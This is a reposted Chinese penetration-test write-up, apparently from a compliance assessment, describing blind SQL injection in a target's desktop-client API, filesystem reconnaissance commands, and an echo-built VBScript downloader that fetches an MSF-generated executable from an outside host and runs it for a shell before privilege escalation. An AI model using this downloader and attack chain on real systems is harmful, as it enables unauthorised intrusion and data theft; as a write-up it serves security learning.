安基網 首頁 安全 滲透測試 查看內容

等保測評之滲透測試

2020-1-11 12:03| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 得到目標后,先對目標官網進行了一次常規的滲透檢測,并沒有發現什么突破口,然后又檢測了下 APP 然而還是么有什么卵用。在一籌莫展之時發現目標還有 PC 端的軟件,果斷下載抓包測試一番,成功得到 2 處 SQL 注入漏洞。目標官網:www.xxx.com 軟件的URL:sbl-webapi.sss.com 對 sbl-webapi.sss.com 服 ...

得到目標后,先對目標官網進行了一次常規的滲透檢測,并沒有發現什么突破口,然后又檢測了下 APP 然而還是么有什么卵用。
在一籌莫展之時發現目標還有 PC 端的軟件,果斷下載抓包測試一番,成功得到 2 處 SQL 注入漏洞。

目標官網:www.xxx.com 軟件的URL:sbl-webapi.sss.com 對 sbl-webapi.sss.com 服務器進行端口掃描發現存在 1433 和 3389
注入點是降權的 DBA 權限的 盲注,os-shell 交互shell 10分鐘一條回顯,速度巨慢,經過幾天的折騰,曾成功進入過 2 個后臺,但是 2 處后臺雖然存在任意上傳,但是啟用的阿里云的 oss ,所以注定圖片上傳沒戲,其他地方也沒發現什么突破口。。。
然后想的是尋找絕對路徑直接寫 shell 反正有交互 shell 嘛。

Shell

dir /S /D c:web.config

復制 文本

使用上方的命令嘗試搜索 CDEF 結果并沒有搜到目標絕對路徑,不過得到這么一個路徑:c:inetpubwwwrootLHWeb
使用下方命令確定盤符:

Shell

wmic logicaldisk where DriveType=3 get DeviceID

復制 文本

得到 C、F 2個盤,但是F盤是空的。
嘗試往 c:inetpubwwwrootLHWebupload 寫 1.txt 測試,訪問發現不存在,但是文件又確實寫入了,因此判斷非絕對路徑,但是實在找不到別的路徑了。
嘗試讀取配置文件 type c:inetpubwwwrootLHWebweb.config 然而里面并沒有我想要的東西。。。
如果用命令繼續翻目錄讀目錄,按照這交互速度,那得折騰到啥時候去。。。其實已經折騰兩天多了。。
最后想到個方法成功搞定:

Shell

echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments( 0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> d.vbscscript d.vbs http://1.1.1.1/1.exe C:Windowstemp1.exe

復制 文本


通過上方的命令,成功下載了MSF生成的shell.exe到目標服務器,然后執行獲取到一個低權限交互shell


然后利用巴西烤肉成功提權


然后快樂的去登陸 3389 ,結果失敗,然后把,不得不認清現實,站酷分離.....
嘗試 getpass 看看是不是統一的密碼,結果失敗,沒讀出來,
好吧好吧,system 權限的交互shell,慢慢折騰吧,經過各種翻文件,最后終于找到了我要的東西:



至此成功搞定~



小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/a6779759586569093640/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


鮮花

握手

雷人

路過

雞蛋

相關閱讀

最新評論

 最新
返回頂部
创业如何赚钱